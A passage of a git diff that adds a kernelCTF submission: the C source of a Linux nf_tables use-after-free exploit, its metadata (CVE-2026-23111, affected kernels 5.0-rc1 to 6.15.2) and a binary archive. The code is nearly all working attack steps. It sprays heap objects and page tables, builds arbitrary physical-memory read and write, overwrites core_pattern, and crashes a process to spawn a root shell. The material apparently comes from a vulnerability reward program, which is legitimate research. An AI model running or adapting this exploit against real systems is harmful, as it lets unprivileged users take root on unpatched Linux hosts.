perror("getrlimit"); + return 1; + } + + DEBUG_PRINT("Current maximum file descriptors limit: %ld\n", rlim.rlim_cur); + + // Increase the maximum file descriptors limit + rlim.rlim_cur = rlim.rlim_max; + if (setrlimit(RLIMIT_NOFILE, &rlim) == -1) { + perror("setrlimit"); + return 1; + } + + // Get the updated resource limits + if (getrlimit(RLIMIT_NOFILE, &rlim) == -1) { + perror("getrlimit"); + return 1; + } + + DEBUG_PRINT("New maximum file descriptors limit: %ld\n", rlim.rlim_cur); + + return 0; +} + +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + + unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); + + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + + return; +} + +void set_cpu_affinity(int cpu_n, pid_t pid) { + cpu_set_t *set = malloc(sizeof(cpu_set_t)); + + CPU_ZERO(set); + CPU_SET(cpu_n, set); + + if (sched_setaffinity(pid, sizeof(set), set) < 0){ + perror("sched_setaffinity"); + return; + } + free(set); +} + +/* ══════════════════════════════════════════════════════════════════ */ + +#define DEFRAG_MSG_SPARY_SZ 0x200 +#define DEFRAG_SOCK_SPARY_SZ 0x200 +#define CC_MSG_SPARY_SZ 0x400 +#define RECLAIM_SOCK_SPARY_SZ 0x400 +#define PIPE_SPARY_SZ 0x80 + +#define UNIX_MAGIC_ADDR 0xdeadbeef + +#define MSG_MSG_SIZE 0x80 +#define PG_SIZE 0x1000 + +#define PT_SPRAY_SZ 0x100 +#define MMAP_ADDR 0x10000000 +#define MMAP_GAP 0x200000 +#define MMAP_SZ (PT_SPRAY_SZ * MMAP_GAP) + + +void flush_tlb(void *ptr, size_t count) { + if (mprotect(ptr, count, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) { + perror("flush_tlb mprotect 1"); + for(;;); + } + if (mprotect(ptr, count, PROT_READ | PROT_WRITE) < 0) { + perror("mprotect mprotect 2"); + for(;;); + } + sched_yield(); + asm volatile("clflush 0(%0)\n" : : "c"(ptr) : "rax"); +} + +void hex_dump(const void *data, size_t len) +{ + const unsigned char *p = data; + + for (size_t i = 0; i < len; i++) { + DEBUG_PRINT("%02x ", p[i]); + if ((i & 0xF) == 0xF) + putchar('\n'); + } + + if (len & 0xF) + putchar('\n'); +} + +void aar(int fd[], void *virt_dst, void *phys_src, void *corrupted_addr, size_t len) +{ + size_t 
num_pages; + uintptr_t tmp[PG_SIZE / sizeof(uintptr_t)]; + uintptr_t offset, p; + int flags, i; + + offset = (uintptr_t)phys_src & 0xfff; + p = (uintptr_t)phys_src & ~0xfff; + + num_pages = (len + PG_SIZE - 1) / PG_SIZE; + + if (read(fd[0], tmp, PG_SIZE) != PG_SIZE) { + perror("aar read"); + for(;;); + } + + flags = tmp[0] & 0xfff; + + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; + p += PG_SIZE; + } + + if (write(fd[1], tmp, PG_SIZE) != PG_SIZE) { + perror("aar write"); + for(;;); + } + + flush_tlb(corrupted_addr, len); + memcpy(virt_dst, corrupted_addr + offset, len); +} + +void aaw(int fd[], void *phys_dst, void *virt_src, void *corrupted_addr, size_t len) +{ + size_t num_pages; + uintptr_t tmp[PG_SIZE / sizeof(uintptr_t)]; + uintptr_t dst, offset, p; + int flags, i; + + dst = (uintptr_t)phys_dst; + offset = dst & 0xfff; + dst ^= offset; + p = dst; + + num_pages = (len + PG_SIZE - 1) / PG_SIZE; + + if (read(fd[0], tmp, PG_SIZE) != PG_SIZE) { + perror("aaw read"); + for(;;); + } + + flags = tmp[0] & 0xfff; + + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; + p += PG_SIZE; + } + + if (write(fd[1], tmp, PG_SIZE) != PG_SIZE) { + perror("aaw write"); + for(;;); + } + + flush_tlb(corrupted_addr, len); + memcpy(corrupted_addr + offset, virt_src, len); +} + +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", MFD_EXEC); + // send our binary to memfd for core_pattern payload + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); + // our binary now at file descriptor 666 + dup2(memfd, 666); + close(memfd); + sleep(1); + while (check_core() == 0){ + sleep(1); + } + DEBUG_PRINT("Root shell !!"); + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ + *(size_t *)0 = 0; +} + +int main(int argc, char *argv[]) +{ + uint32_t seq = 0; + int family = NFPROTO_IPV4; + const char *table = "poc_table"; + const char *bchain = "base_chain"; + const char *tchain = "target_chain"; + const char *mapname = "vmap"; + uint32_t mapid = 100; + int ret; + + int defrag_msg_arr[DEFRAG_MSG_SPARY_SZ]; + int defrag_sock_arr[DEFRAG_SOCK_SPARY_SZ]; + + int cc_msg_arr1[CC_MSG_SPARY_SZ]; + int cc_msg_arr2[CC_MSG_SPARY_SZ]; + + int server_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int client_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int reclaim_sock_arr[RECLAIM_SOCK_SPARY_SZ]; + int pipe_arr[PIPE_SPARY_SZ][2]; + + char msg_msg_buf[PG_SIZE], pipe_buf[PG_SIZE], tmp_buf[PG_SIZE]; + int a; + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + setvbuf(stderr, 0, 2, 0); + + if(argc > 2){ + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + + system("cat /flag"); + + execlp("bash", "bash", NULL); + } + + /* ── kernelXDK target detection ── */ + TargetDb kxdb("target_db.kxdb", target_db); + + Target st("kernelctf", "cos-121-18867.294.100"); + st.AddStruct("unix_address", 8, {}); + st.AddSymbol("core_pattern", 0x3fb3440); + kxdb.AddTarget(st); + + auto target = kxdb.AutoDetectTarget(); + 
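/* + * The detected target provides the only environment-specific values used + * from here on: the msg_msg header size (for the msgsnd sprays), the + * unix_address size (for the abstract-socket bind length), and the + * core_pattern symbol offset (for the final physical-memory scan). + */ + 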
DEBUG_PRINT("[+] Running on target: %s %s\n", + target.GetDistro().c_str(), + target.GetReleaseName().c_str()); + + auto msg_msg_hdr_size = target.GetStructSize("msg_msg"); + auto unix_address_size = target.GetStructSize("unix_address"); + auto core_pattern_offset = target.GetSymbolOffset("core_pattern"); + + unshare_setup(getuid(), getgid()); + ulimit_fd(); + set_cpu_affinity(0, 0); + + nl = mnl_socket_open(NETLINK_NETFILTER); + if (!nl) err(1, "mnl_socket_open"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + err(1, "mnl_socket_bind"); + portid = mnl_socket_get_portid(nl); + + int fd = mnl_socket_get_fd(nl); + struct timeval tv = { .tv_sec = 1, .tv_usec = 0 }; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + /* ── Cleanup ── */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_table(b, &seq, family, table); + batch_end(b, &seq); + send_batch_and_recv(b); + } + + /* ══ Phase 0: Inits ══ */ + + init_msgq(defrag_msg_arr, DEFRAG_MSG_SPARY_SZ); + init_unix_sock(defrag_sock_arr, DEFRAG_SOCK_SPARY_SZ); + + init_msgq(cc_msg_arr1, CC_MSG_SPARY_SZ); + init_msgq(cc_msg_arr2, CC_MSG_SPARY_SZ); + init_unix_sock(server_sock_arr, RECLAIM_SOCK_SPARY_SZ); + init_unix_sock(client_sock_arr, RECLAIM_SOCK_SPARY_SZ); + init_unix_sock(reclaim_sock_arr, RECLAIM_SOCK_SPARY_SZ); + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (pipe2(pipe_arr[i], O_NONBLOCK) < 0) { + perror("init pipe"); + for(;;); + } + } + + memset(msg_msg_buf, 0, sizeof(msg_msg_buf)); + memset(pipe_buf, 0, sizeof(pipe_buf)); + memset(tmp_buf, 0, sizeof(tmp_buf)); + + + /* ══ Phase 1: Setup ══ */ + DEBUG_PRINT("[*] Phase 1: Creating table, chains, verdict map + catchall...\n"); + + /* Phase 1a: table + base chain + set*/ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_table(b, &seq, family, table); + add_chain(b, &seq, family, table, bchain, true); + add_verdict_map(b, &seq, family, table, mapname, mapid); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1a failed: %d (%s)\n", ret, strerror(-ret)); + for(;;); + } + DEBUG_PRINT("[+] Phase 1a: table, base chains, verdict map created.\n"); + } + + /* Phase 1b - 1d: spray msg_msg and chain */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_chain(b, &seq, family, table, tchain, false); + batch_end(b, &seq); + + memset(msg_msg_buf, 0, 0x1000); + + + sched_yield(); + spray_msgsnd(cc_msg_arr1, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_hdr_size, msg_msg_buf, 1, 2); + ret = send_batch_and_recv(b); + spray_msgsnd(cc_msg_arr2, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_hdr_size, msg_msg_buf, 1, 2); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1c failed: %d (%s)\n", ret, strerror(-ret)); + for(;;); + } + + DEBUG_PRINT("[+] Phase 1b-d: victim chains created.\n"); + } + + /* Phase 1e: add catchall element with raw NLA (bypass libnftnl verdict API) */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + add_catchall_elem_raw(b, &seq, family, table, mapname, mapid, tchain); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret < 0) { + fprintf(stderr, "[-] Phase 1b (catchall element) failed: %d (%s)\n", + ret, strerror(-ret)); + fprintf(stderr, " This may mean the kernel does not support " + "NFT_SET_ELEM_CATCHALL (requires >= 5.13)\n"); + for(;;); + } + DEBUG_PRINT("[+] Phase 1e: catchall element (goto %s) added.\n", 
tchain); + } + + DEBUG_PRINT("[+] Phase 1 done.\n\n"); + + /* ══ Phase 2: Abort and Reclaim ══ */ + + DEBUG_PRINT("[*] Phase 2: DELSET(vmap) + NEWRULE(fail) → abort\n"); + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + trigger_abort(b, &seq, family, table, mapname); + batch_end(b, &seq); + ret = send_batch_and_recv(b); + if (ret != -2) { + perror("unexpected error on abort"); + for(;;); + } + } + + DEBUG_PRINT("[*] defrag socket\n"); + struct sockaddr_un un_addr; + size_t addr_len = 0x10 - unix_address_size; + memset(&un_addr, 0, sizeof(struct sockaddr_un)); + un_addr.sun_family = AF_UNIX; + un_addr.sun_path[0] = '\0'; + + DEBUG_PRINT("[*] now free and reclaim\n"); + /* Probe: try DELCHAIN to check if chain->use == 0 */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_chain(b, &seq, family, table, tchain); + batch_end(b, &seq); + + sched_yield(); + for(int i = 0; i < DEFRAG_SOCK_SPARY_SZ; i++){ + *(size_t *)(&un_addr.sun_path[1]) = i + 1; + if (bind(defrag_sock_arr[i], (struct sockaddr *)&un_addr, addr_len) < 0) { + perror("defrag bind"); + for(;;); + } + } + + release_msg(cc_msg_arr1, CC_MSG_SPARY_SZ); + release_msg(cc_msg_arr2, CC_MSG_SPARY_SZ); + ret = send_batch_and_recv(b); + usleep(100); + + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + *(size_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + if (bind(server_sock_arr[i], (struct sockaddr *)&un_addr, addr_len) < 0) { + perror("reclaim bind"); + for(;;); + } + } + + if (ret == 0) { + DEBUG_PRINT("[!] DELCHAIN succeeded!\n"); + } + else{ + perror("error on delchain"); + for(;;); + } + } + + DEBUG_PRINT("[*] connect and check\n"); + int tmp_sock; + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + if (listen(server_sock_arr[i], 2) < 0){ + perror("reclaim listen"); + for(;;); + } + + *(uintptr_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + ret = connect(client_sock_arr[i], (struct sockaddr*)&un_addr, addr_len); + if (ret < 0 && errno != EINPROGRESS){ + perror("reclaim connect"); + for(;;); + } + + if ((tmp_sock = accept(server_sock_arr[i], NULL, NULL)) < 0){ + perror("accept"); + for(;;); + } + close(tmp_sock); + } + + /* Cleanup */ + { + struct mnl_nlmsg_batch *b = mnl_nlmsg_batch_start(buf, sizeof(buf)); + batch_begin(b, &seq); + del_table(b, &seq, family, table); + batch_end(b, &seq); + send_batch_and_recv(b); + } + usleep(100); + + int * curr = (int *)pipe_buf; + for(int i = 0; i < sizeof(pipe_buf) / sizeof(int); i++){ + curr[i] = 1; + } + + DEBUG_PRINT("probing\n"); + struct sockaddr_un uaf_addr; + socklen_t uaf_addr_len = sizeof(uaf_addr); + int uaf_idx = -1; + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++){ + if(uaf_idx > 0){ + close(client_sock_arr[i]); + continue; + } + + sched_yield(); + close(client_sock_arr[i]); + if (getsockname(server_sock_arr[i], (struct sockaddr *)&uaf_addr, &uaf_addr_len) < 0) { + perror("probe getsockname"); + for(;;); + } + + ret = *(uintptr_t *)(&uaf_addr.sun_path[1]); + if(ret - UNIX_MAGIC_ADDR != i + 1){ + DEBUG_PRINT("%d uaf! 
0x%x\n", i, ret); + uaf_idx = i; + } + } + + for(int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) + if(i != uaf_idx) close(server_sock_arr[i]); + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (write(pipe_arr[i][1], pipe_buf, PG_SIZE) != PG_SIZE){ + perror("deref write"); + for(;;); + } + } + + void * addr; + if ((addr = mmap((void *)MMAP_ADDR, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, -1, 0)) == MAP_FAILED){ + perror("mmap"); + for(;;); + } + madvise((void *)MMAP_ADDR, MMAP_SZ, MADV_NOHUGEPAGE); + + DEBUG_PRINT("[*] Spraying page tables...\n"); + + sched_yield(); + close(server_sock_arr[uaf_idx]); + uintptr_t pte; + int pt_idx; + for (int i = 0; i < PT_SPRAY_SZ; i++) { + *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i) = i + 1; + } + + for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (read(pipe_arr[i][0], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("deref read"); + for(;;); + } + + if(*((int *)tmp_buf) != 0x1){ + pte = *((uintptr_t *)tmp_buf); + DEBUG_PRINT("pte found! : 0x%lx\n", pte); + pt_idx = i; + //hex_dump(tmp_buf, 0x20); + *((uintptr_t *)tmp_buf) = pte - 0x4000; + + if (write(pipe_arr[i][1], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("deref write 2"); + for(;;); + } + + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } + } + + uintptr_t pt_addr; + for (int i = 0; i < PT_SPRAY_SZ; i++) { + ret = *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i); + if(ret != i + 1){ + DEBUG_PRINT("corrupt va found: %d has %d\n",i, ret); + pt_addr = (uintptr_t)addr + MMAP_GAP * i; + break; + } + } + + + DEBUG_PRINT("user va %p\n", (void *)pt_addr); + int cnt = 0; + while(1){ + DEBUG_PRINT("slide %d\n", cnt); + + memset(tmp_buf, 0, sizeof(tmp_buf)); + aar(pipe_arr[pt_idx], tmp_buf, (void *)(core_pattern_offset + cnt * 0x1000000), pt_addr, PG_SIZE); + char * core_pattern_addr = (char *)(pt_addr + (core_pattern_offset & 0xfff)); + if(!strcmp(core_pattern_addr, "core")){ + DEBUG_PRINT("core_pattern found!\n"); + strcpy(core_pattern_addr, "|/proc/%P/fd/666 %P %P"); + + if (read(pipe_arr[pt_idx][0], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("post read"); + for(;;); + } + + *((uintptr_t *)tmp_buf) = 0; + + if (write(pipe_arr[pt_idx][1], tmp_buf, PG_SIZE) != PG_SIZE){ + perror("post write"); + for(;;); + } + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } + + + // munmap(MMAP_ADDR, MMAP_SZ); + + cnt ++; + } + + + if (fork() == 0) + { + set_cpu_affinity(1, 0); + setsid(); + crash(""); + for(;;); + } + + // //mnl_socket_close(nl); + // return 0; + + +out: + DEBUG_PRINT("done wait for shell...\n"); + for(;;); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json new file mode 100644 index 000000000..a6d144510 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/metadata.json @@ -0,0 +1,34 @@ +{ + "$schema":"https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids":[ + "exp446" + ], + "vulnerability":{ + "patch_commit":"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8", + "cve":"CVE-2026-23111", + "affected_versions":[ + "5.0-rc1 - 6.15.2" + ], + "requirements":{ + "attack_surface":[ + "userns" + ], + "capabilities":[ + "CAP_NET_ADMIN" + ], + "kernel_config":[ + "CONFIG_NETFILTER", "CONFIG_NF_TABLES" + ] + } + }, + "exploits": { + "cos-121-18867.294.100": { + "uses":[ + "userns" + ], + "requires_separate_kaslr_leak": false, + "stability_notes":"6 ~ 7 times (exclude post-exploitation) or 2~3 times 
(include post-exploitation) successes per 10 runs" + } + } +} + diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz new file mode 100644 index 000000000..84d565ce3 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23111_cos/original.tar.gz differ